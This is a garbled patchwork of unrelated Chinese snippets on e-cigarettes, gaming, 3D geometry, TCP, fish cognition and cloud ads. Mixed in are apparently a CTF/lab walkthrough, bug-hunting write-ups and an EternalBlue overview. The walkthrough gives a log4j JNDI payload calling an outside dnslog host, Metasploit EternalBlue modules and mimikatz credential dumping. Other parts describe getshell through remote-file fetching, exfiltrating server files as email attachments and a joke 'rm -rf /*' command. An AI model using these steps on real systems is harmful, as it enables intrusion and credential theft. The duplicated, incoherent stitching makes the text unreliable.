文章来源:蓝洞新消费(公众号:landongpro) 蓝洞新消费报道,7月30日消息,国内电子烟品牌雪加昨天在北京发布了名为电子咖啡的新产品,一杆两弹定价298元。 蓝洞在「添加剂的允许使用品种、使用范围以及最大使用量或残留量查询」数据库查询后发现,可以添加咖啡因的食品名称只有一种,即可乐型碳酸饮料。 那么,电子咖啡烟弹属于食品吗?属于可乐型碳酸饮料吗? 那么,是否可以得出咖啡因和尼古丁的吸收方式是一样的?我们不确定,蓝洞是文科生啊,这个涉及的知识面太广了。不过直觉来判断,应该都是通过肺部吸收。 我们只想说,烟弹应该不算食品。 蓝洞根据这个线索继续查找和药监局相关的规定。 《咖啡因管理规定》于2001年2月1日经局务会议审议通过,自2001年5月1日起施行。 蓝洞还问询了另外一家电子烟品牌CEO,他表示,食品里面提及添加咖啡因的产品需要有保健品许可证,并且咖啡因通过肺部吸收不一定有效。
联想到最近出的log4j2的洞,可能他只是一个日志文件所以并没有框架 使用payload=${jndi:ldap://p9j8l8.dnslog.cn}验证一下有回显证明存在漏洞 尝试进一步利用漏洞 445端口进一步扫描 先确定一下系统版本,使用auxiliary/scanner/smb/smb_version模块,发现是win7 sp1 看能不能利用永恒之蓝,这里使用到auxiliary/scanner /smb/smb_ms17_010模块,发现可以利用永恒之蓝 使用exploit/windows/smb/ms17_010_eternalbule模块,因为是不出网环境,这里需要用到bind_tcp载荷 meterpreter 在C:\Users\root\Desktop下拿到第二个flag 然后继续进行信息搜集,发现同样是双网卡,还存在10.0.0.0/24段的一张网卡 ipconfig /all看到dns服务器为 redteam.lab应该在域内 这里ping一下redteam.lab得到域控的ip为10.0.0.12 这里不知道域控有什么洞,先上传一个mimikatz把密码抓取出来,得到Administrator
联想到最近出的log4j2的洞,可能他只是一个日志文件所以并没有框架 [image-20211224190525232.png] [image-20211224190530749.png] 使用payload 先确定一下系统版本,使用auxiliary/scanner/smb/smb_version模块,发现是win7 sp1 [image-20211225103930675.png] 看能不能利用永恒之蓝, 这里使用到auxiliary/scanner/smb/smb_ms17_010模块,发现可以利用永恒之蓝 [image-20211225104032698.png] 使用exploit/windows/ 20211225122641642.png] 然后继续进行信息搜集,发现同样是双网卡,还存在10.0.0.0/24段的一张网卡 [image-20211225122150051.png] ipconfig /all看到dns服务器为 20211225122713816.png] 这里ping一下redteam.lab得到域控的ip为10.0.0.12 [image-20211225122733967.png] 这里不知道域控有什么洞,
腾讯将代理《绝地求生》国服,并确保其符合价值观 11 月 22 日中午,腾讯正式宣布与 Bluehole(蓝洞)旗下的 PUBG 达成战略合作协议,正式获得《Playerunknown's Battlegrounds 腾讯方面在相关声明中表示,会协同 PUBG 公司,为国服提供网络优化、服务器扩容、外挂打击等技术支持。
那么本文将‘简单描述’一下掏洞的过程,我之所以说‘简单描述’是因为本文中不会掺杂 ‘墙’ 这个话题,在本文中只简述《如何在ThreeJS中的立方体上掏洞 》的干货。 示例由于ThreeJS本身并没有提供用于几何体布尔运算的函数,那么首先认识一个可以实现对几何体布尔运算 的扩展库 ThreeBSP ,它来自GitHub,它可以帮我们获取两个几何体的相同部分、将两个几何体合并 相关函数名称描述intersect(交集)获取两个几何体的相同部分union(并集)将两个几何体合并subtract(差集)从一个几何体中删除与另一个几何体重合的部分。 函数取差集实现! 创建一个‘洞’的几何体!意思就是,你要挖山洞,不光要找好被挖的山,还要设计一个洞!调用ThreeBSP的subtract函数进行几何体布尔运算!意思就是,找工程队开挖!
Euler数的定义为:“体”的个数减去“洞”的个数。 因为,无论是“体”的数目还是“洞”的数目,都无法通过局部求和计算出来,但是,对于它们的差(即:Euler数),却是可以通过局部求和计算出来的。 H 的差。 假设我们所选择的流方向是:从西北指向东南的,那么,我们需要寻找下面两种“模式”,即: 在图像中出现的次数,例如,如果一个二值图包含:一个长方形的“体”和一个长方形的“洞”,那么,X=1 ,并且,V=1 如果选择其他的流方向,那么,我们会得到其他的“模式”,但是,Euler数是不会发生变化的。(对于新的流方向,即使 X 和 V 的值都发生了变化,但是,它们的差始终保持不变)。
域名解析 互联网上穿梭的数据包基本都是IP包,所以笔者与博客园新闻站点服务器传输的也是IP包,那么我们就需要博客园新闻站点服务器的IP地址。 TCP进程:洞腰洞腰,我是洞拐,听到请回话 Cnblogs服务器:洞拐洞拐,我是洞腰,我听到了 TCP进程:OK,我听到你说话了。 4. 比如我们每次要传输1000字节的数据,初始序列号为1,那么就将SEQ设置为1,然后本地的TCP进程就把这1000个字节打包,然后层层地封装、传输,并最终到达服务器TCP进程。 TCP进程:洞腰洞腰,我是洞拐,数据传输完毕,我要关闭连接我的数据传输口了 Cnblogs服务器:洞拐洞拐,我是洞腰,我听到了,你关闭吧 (TCP进程默默关闭数据传输口(Cnblogs服务器的数据接收口 )) Cnblogs服务器:洞拐洞拐,我是洞腰,数据传输完毕,我要关闭连接我的数据传输口了 TCP进程:洞腰洞腰,我是洞拐,我听到了,你关闭吧 (Cnblogs服务器默默关闭数据传输口(TCP进程的数据接收口
那么问题来了,谁来引领这条“试炼之路”呢? 如果尝试对HR进行攻击,那么可以设计植入木马的简历文档,如果计划从线上服务入手,可以通过自动化扫描、人工测试等手段对目标资产进行漏洞探测,发现可利用的0day漏洞。 2008年,腾讯自主研发的服务器安全系统(代号“洋葱”)正式上线,蓝军开启APT红蓝对抗演练,每年开展数十次演习持续助力提升检测能力。 经过多年激烈的红蓝对抗演习,红蓝双方你追我赶,相互促进,公司安全防护体系有着非常大的提升,服务器安全系统(“洋葱”)、DDoS防护系统(“宙斯盾”)、Web应用防火墙(“门神”)、Web漏洞检测系统(“ 洞犀”)等公司安全系统的技术能力都取得了不错的提升。
个人感觉这个洞挖的还是蛮有意思的。 山穷水尽疑无路 大概是因为爱情吧,在如下图的那么多个文件夹中,我只看了这一个文件夹,里面的一个 PHP 文件夹吸引了我,而这里面确实藏有惊喜。 抓取远程文件的注释激起了我的兴趣,第一个想法是否能够从我自己的服务器上抓取到一个文件来 getshell 呢? ? source 就是目标服务器的 URL,简单的构造发包,看看结果。 个人觉得黑盒加白盒的测试效果好。 ? 得到的结果如上图所示,感觉是把文件保存下来了,于是去看看文件夹里有没有多了什么东西。 柳暗花明又一村 根据上文,我们已经可以创建一个脚本文件了,那么现在如何给这个脚本文件里注入恶意代码呢? 也就是如何控制里面的内容? 写在最后 由于是在后台,如果有机会的话,可以加上 CSRF 稍微降低一些攻击门槛(其实差不了太多)。有时候可能在某处产生的漏洞点只是一个小问题,而许多个小问题加起来,也许小洞就变大洞了。
mp.weixin.qq.com/s/QkJHvVhQhIQAk1FYvp-UTg 4Redis 本文首先通过Redis到底能存储多少个键值对,引出Redis的Hash表实现方式(数组链表)、扩缩容等原理,最后通过一个开脑洞的思考探讨 https://mp.weixin.qq.com/s/POMluy69sphGZ_AlDnJ0og 8elasticsearch elastic如今与阿里云有了深度合作,相信以后越来越多的公司会接入,那么 https://mp.weixin.qq.com/s/zt-Gs2W7e0pv50tnb22PLw 11开心一刻 小编我上周五去一公司面试,他们要我写个shell,我在他们服务器输入rm-rf/*, 回车 致谢: 周蓬勃、王在道、孙亚飞、冯艺帆、陈少军、邓开表、张少华、薛述强、刘彬、刘超、廖程鹏、董言、吕西金、朱洁、蓝随、黄文辉、郭飞
钓鱼 第二天也是拿到了邮箱系统的账号,这个邮箱系统也是扫到的资产之一,提供了账号的话就可以用来发邮件钓鱼了,但是不得不说这个比赛由于在国外举办,网络质量真的差的离谱,在一些站点找到一些邮箱后,用cobalt Last Day 第二天的后半程并没有挖到什么洞,主要原因还是资产收集做的不到位,扫到的几个资产感觉洞基本都挖完了,然后排行榜一直在掉。 挖洞 第三天有学长来帮忙看了看比赛,扫到了一些其他的资产,也挖到了一些有趣的洞。 然后抓包看了看还发现有attachment参数,默认attachment是空的,这里就尝试传了filename和path参数,真的把web服务所在的服务器的文件带上发出了邮件到我们的邮箱!! Log4j RCE 发现了一个minecraft的服务器,还有jar包,发现用的log4j 2.00,这里应该是存在log4j rce的漏洞的,只不过很可惜发现的时候只有一个小时了也还没打通。
现在不用那么无聊了,只要拿上一部手机,打开“游云南”慢直播,云南上百美景,想看哪看哪,想怎么看就怎么看。 让你不再家里无聊游 #足不出户#也能游大美“七彩云南” “游云南” 慢直播 慢直播 ◆ 滇西线 丽江 丽江古城大研花巷观景台 丽江古城远眺玉龙雪山 丽江老君山千龟一条龙 丽江古城万古楼远眺玉龙雪山 丽江玉龙雪山蓝月谷全景 大理巍山南诏古街 大理剑川西南敦煌石钟山石窟 迪庆 迪庆香格里拉普达措属都湖葱茏牧场全景 迪庆香格里拉普达措属都湖晨雾 迪庆梅里雪山飞来寺 迪庆梅里雪山金沙江大湾景区 迪庆香格里拉松赞林景区远景 迪庆香格里拉蓝月山谷景区亚拉青波牧场 楚雄禄丰世界恐龙谷遗址馆展厅 楚雄彝人古镇望江楼 楚雄彝人古镇桃花溪 楚雄元谋土林景区小西天 楚雄元谋土林仙女台 楚雄武定狮子山平顶玉湖 玉溪 玉溪映月潭休闲文化中心晓月湖 玉溪抚仙湖 玉溪新平磨盘山麂子箐 玉溪抚仙湖明星渔洞
那么这条鱼就需要穿过只有1个蓝色图标的那扇门,如果游得正确,那它就会得到奖励。 减法的原理也可以以此类推。 实验结果发现,6条斑马拟丽鱼和3条黄貂鱼竟然能够记住蓝、黄色与加、减法之间的关系。 那么它们是花了多长时间学会的算数呢? 研究人员表示,斑马拟丽鱼在平均28个回合后学会;黄貂鱼的这个平均数,则是68个回合。 网友惊呼神奇 鱼会数学,面对这样的实验结果,网友们纷纷表示“神奇”: 也有网友脑洞大开,想起了那句老人们常说的话: 吃鱼会变聪明…… 那么,你对于这项研究怎么看呢?欢迎在评论区留言讨论。
事实上,除了这一潜伏 17 年之久的漏洞,安全圈“老洞”也数不胜数,宅客这里就简单盘点几个。 WannaCry 使用了美国国家安全局的“永恒之蓝”(EternalBlue)工具进行攻击。 恶意代码会扫描开放 445 文件共享端口的 Windows 机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 而永恒之蓝实际上也是一个隐匿很久的漏洞。 它利用了 Windows 服务器消息块 1.0(SMBv1)的数个漏洞,这些漏洞在通用漏洞披露(CVE)网站中分别被列为 CVE-2017-0143 至 0148。
568A的排线顺序从左到右依次为:白绿、绿、白橙、蓝、白蓝、橙、白棕、棕。 568B的排线顺序从左到右依次为:白橙、橙、白绿、蓝、白蓝、绿、白棕、棕。 这样虽能连通网络,但这种线的抗干扰性非常差,经常出现诸如传输速度慢、网络时好时坏的情况。 当以下设备互联时,需使用直连线: 1.将交换机或HUB与路由器连接; 2.计算机(包括服务器和工作站)与交换机或HUB连接。
那么,为什么异步比同步的 QPS 要高呢?原因是 Node.js 底层的libuv 用了多个线程进行计算,这里就不再深入介绍了。 svg 火焰图的其他小技巧如下。 红蓝差分火焰图 虽然我们有了火焰图,但要处理性能回退问题,还需要在修改代码前后的火焰图之间不断切换和对比,来找出问题所在,很不方便。于是 Brendan D. Gregg 又发明了红蓝差分火焰图(Red/Blue Differential Flame Graphs),如下图所示,其中,红色表示增长,蓝色表示衰减。 ? 红蓝差分火焰图的工作原理如下。 这样,通过红蓝差分火焰图,我们就可以清楚地看到当前系统的性能差异。 生成红蓝差分火焰图的流程如下。 总之,红蓝差分火焰图可能只在代码变化不大的情况下使用时效果明显,在代码变化较大的情况下使用时效果可能就不明显了。 本文选自《Node.js调试指南》
现在小蓝手里有 0 到 9 的卡片各 2021 张,共 20210 张,请问小蓝可以从 1 拼到多少? 提示:建议使用计算机编程解决问题。 对于两个不同的结点 a, b,如果 a 和 b 的差的绝对值大于 21,则两个结点之间没有边相连;如果 a 和 b 的差的绝对值小于等于 21,则两个点之间有一条长度为 a 和 b 的最小公倍数的无向边相连 在服务器上,朋友已经获取了当前的时间,用一个整数表示,值为从 1970 年 1 月 1 日 00:00:00 到当前时刻经过的毫秒数。 现在,小蓝要在客户端显示出这个时间。 那么这套砝码最少需要包含多少个砝码? 注意砝码可以放在天平两边。 【输入格式】 输入包含一个正整数 N。 【输出格式】 输出一个整数代表答案。 如果我们认为每个结点的子结点是无序的,那么得到的二叉树可能不唯一。 换句话说,每个结点可以选任意子结点作为左孩子,并按任意顺序连接右兄弟。
大家脑洞大开,想象一下,这个功能软件工程师是怎么设计的呢? 那么我觉得它是怎么设计的呢? 我会这样子设计,首先,收集尽量多的用户的开机时间,然后,查看时间的分布如何。 虽然我们不知道360收集的用户的均值和标准差是多少,但是我们知道一个正态分布的均值和标准差。这个分布叫什么?对了,就是传说中的标准正态分布了。标准正态分布是什么? 别暗爽,我故意写错的,标准正态分布的均值为0,标准差为1! 很开心终于有同学问到正态分布这个问题,也就是统计学的问题,这证明大家开始脑洞大开了,数据分析的基础技能,也就是数据处理、数据分析、数据绘图的小技巧已经满足不了大家了,但是大家的脑洞也只是刚开,未来的路程还很长
判断现在时间和上次备份时间的差是否大于临界时间,如果大于则将is_reproduct设为true。最后会输出delay_time。 那么反过来,只要知道这个文件的创建时间,那么就可以反推出文件名。 而通过之前的分析,我们可以得出上一次创建的备份文件的创建时间,那么其实就可以推出他的文件名了。 那么,这样就造成了一个“备份文件名可被准确计算”的漏洞,造成整站数据库备份泄露。 我们的时区和网站服务器的时区不一定相等,而网站所在服务器是怎样设置时区的我们不知道,所以需要一个个尝试。 这个洞还属于0day漏洞,影响虽说有限,但威力巨大,一下可以拿到整站的数据库,值得关注。
脑洞在博客园已经十几年了,经常会有朋友来问脑洞,30岁了,还能继续做开发吗?我要不要转Java呢?我一般会用亲身经历告诉他,Why Not?我都40了,还在做开发。 很多初学者会在做MVC的时候去看微服务,但实际MVC可能都没很好的掌握,而且有可能你看的微服务在近几年时间你都不会接触,不要浪费那么多时间去学习超纲的东西。 这次脑洞参加了.NET开发者大会,重拾了原有的激情,见到了汪神、苏总、潘校长和张队,虽然没有近距离接触,但看到各位大神依然活跃,心中肃然起敬。脑洞最后还中了个小米充电宝和卫衣,心中无比喜悦。 35岁的时候,脑洞做出了大胆的决定,跳出了国企的舒适圈,重新拾取开发,坦然面对996,如今5年过去,脑洞依然很好,也成为了某上市集团的开发部主管,但脑洞的路并没有终止,今年考了PMP和高软(虽然挂了,不过仅论文差了 脑洞的蜂蜜是我目前的网名,这名字是打王者的时候自动创建的,很喜欢,以后就用这个了。
云端获取和启用云服务器,并实时扩展或缩减云计算资源。云服务器 支持按实际使用的资源计费,可以为您节约计算成本。 腾讯云服务器(CVM)为您提供安全可靠的弹性云计算服务。只需几分钟,您就可以在云端获取和启用云服务器,并实时扩展或缩减云计算资源。云服务器 支持按实际使用的资源计费,可以为您节约计算成本。
扫码关注腾讯云开发者
领取腾讯云代金券
云服务器
即时通信 IM
网站备案
对象存储
实时音视频
